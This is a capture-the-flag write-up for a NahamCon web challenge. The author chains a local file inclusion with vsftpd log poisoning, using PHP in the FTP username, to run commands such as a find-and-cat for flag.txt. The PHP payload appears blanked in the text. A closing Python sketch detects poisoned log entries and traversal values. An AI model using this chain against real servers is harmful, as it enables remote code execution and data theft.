The task gives us two links: the [website of a logging
service](http://challenge.nahamcon.com:31042) and an
[ftp_server](http://challenge.nahamcon.com:30199). We can guess that the second
one is an FTP server from the line "FTP can be used to access raw files if needed"
in the logging service description, or by connecting via netcat:  
```  
~ nc challenge.nahamcon.com 30199  
220 Welcome to FTP Server  
```  
Unfortunately, we can't get access to FTP because we don't know the username
and password:  
```  
~ ftp challenge.nahamcon.com 30199  
Connected to challenge.nahamcon.com.  
220 Welcome to FTP Server  
Name (challenge.nahamcon.com:dizvyagintsev): idontknowusername  
331 Please specify the password.  
Password: idontknowpassword  
530 Login incorrect.  
ftp: Login failed.  
```  
Let's examine the site a bit more. The button "Learn more about our pricing" sends us
to http://challenge.nahamcon.com:31042/index.php?file=pricing. The filename is
sent as a GET parameter, so we can try local file inclusion (LFI).  
![LFI](https://i.ibb.co/3N4bKKq/2021-03-16-14-07-57.png)  
But we don't know which file the flag is in, so we need to find a way to execute
code remotely on the server. I tried some ways from this [cheat sheet](https://highon.coffee/blog/lfi-cheat-sheet/), but nothing worked.  
From /etc/passwd we can find out that the logging service uses Apache as its web
server and vsftpd as its FTP server:  
```  
apache:x:100:101:apache:/var/www:/sbin/nologin  
vsftp:x:101:21:vsftp:/var/lib/ftp:/sbin/nologin  
```  
We can control the content of their logs, so if we can open the Apache or vsftpd
logs through the file inclusion, we can inject PHP code into the site and execute
code remotely. We can't open the Apache log `/var/log/apache2/access.log`, but
`/var/log/vsftpd.log` works.  
![vsftpd logs](https://i.ibb.co/NSXmbxn/2021-03-16-14-39-21.png)  
We can see that vsftpd logs the username, so if it is valid PHP code in ``,
we can execute a bash command passed in the `cmd` GET param.  
```  
ftp challenge.nahamcon.com 30199  
Connected to challenge.nahamcon.com.  
220 Welcome to FTP Server  
Name (challenge.nahamcon.com:dizvyagintsev):  
331 Please specify the password.  
Password:  
530 Login incorrect.  
ftp: Login failed.  
```  
Let's use the `find / -name 'flag.txt' | xargs cat` command, which recursively searches for a flag.txt file starting from the root directory and prints its content.  
![flag](https://i.ibb.co/CmTrwLn/2021-03-16-14-56-49.png)
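
Both halves of this chain leave traces a defender can search for: script tags in the username field of the vsftpd log, and `file=` values that are not bare page names in the web access log. The Python sketch below is an added example, not part of the original writeup; the log lines are constructed, and the vsftpd line layout and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample data. The vsftpd line layout is an assumption:
# '<date> [pid N] [username] FAIL LOGIN: Client "ip"'.
FTP_LOG = [
    'Tue Mar 16 11:38:50 2021 [pid 9] CONNECT: Client "198.51.100.7"',
    'Tue Mar 16 11:38:55 2021 [pid 8] [alice] FAIL LOGIN: Client "198.51.100.7"',
    'Tue Mar 16 11:39:21 2021 [pid 12] [<?php echo 1; ?>] FAIL LOGIN: Client "203.0.113.5"',
]
ACCESS_LOG = [
    '198.51.100.7 - - [16/Mar/2021:11:30:01 +0000] "GET /index.php?file=pricing HTTP/1.1" 200 900',
    '203.0.113.5 - - [16/Mar/2021:11:35:10 +0000] "GET /index.php?file=%2Fetc%2Fpasswd HTTP/1.1" 200 1200',
    '203.0.113.5 - - [16/Mar/2021:11:40:02 +0000] "GET /index.php?file=/var/log/vsftpd.log HTTP/1.1" 200 512',
]

FTP_LOGIN = re.compile(r'\[pid \d+\] \[(?P<user>.*)\] (?:OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"')
CODE_TAG = re.compile(r'<\?|<%|<script', re.I)  # script open tags never belong in a username
SAFE_PAGE = re.compile(r'[A-Za-z0-9_-]+')       # bare page names such as "pricing"
REQUEST = re.compile(r'(?P<ip>\S+) .*?"(?:GET|POST) (?P<url>\S+) HTTP')

def poisoned_ftp_logins(lines):
    """Return (ip, username) for login attempts whose username carries a script tag."""
    hits = []
    for line in lines:
        m = FTP_LOGIN.search(line)
        if m and CODE_TAG.search(m.group('user')):
            hits.append((m.group('ip'), m.group('user')))
    return hits

def suspicious_includes(lines, param='file'):
    """Return (ip, value) for requests whose decoded ?file= value is not a bare page name."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        # parse_qs percent-decodes, so encoded slashes and dots are caught too
        for value in parse_qs(urlsplit(m.group('url')).query).get(param, []):
            if not SAFE_PAGE.fullmatch(value):
                hits.append((m.group('ip'), value))
    return hits

if __name__ == '__main__':
    print(poisoned_ftp_logins(FTP_LOG))
    print(suspicious_includes(ACCESS_LOG))
```

The same `SAFE_PAGE` pattern works as an allowlist check on the server side: a `file` value that fails it should never reach the include call.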